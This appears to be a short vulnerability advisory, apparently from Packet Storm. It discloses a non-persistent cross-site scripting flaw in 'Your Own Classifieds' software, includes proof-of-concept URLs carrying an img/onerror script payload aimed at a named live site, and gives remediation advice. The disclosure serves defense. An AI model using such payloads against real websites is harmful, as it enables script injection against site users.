Your Own Classifieds suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
e786093e3303c069a9fedd85ac436abf93cbe3ccc5bf77ce4365711adb19c1e0*Vendor:
*
http://www.yourownclassifieds.com
*Description:
*
Your own classified software is a script that helps you creates your own
store.
*Discovered by: Rafay Baloch*
Vulnerability: Non persistent XSS
The script fails to sanitize the input that is entered into the text box
resulting into a XSS.
*POC*:
http://www.gumtreeclone.com/cat-search/for-sales-2/XSS
http://www.gumtreeclone.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E
*Fix*:
- All input generated at any point inside the application should be html
encoded and filtered/sanitized before it's
copied to the application response.
- All html special characters should be replaced with it's corresponding
html entities.
--
Warm Regards,
Rafay Baloch
http://rafayhackingarticles.net
http://techlotips.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed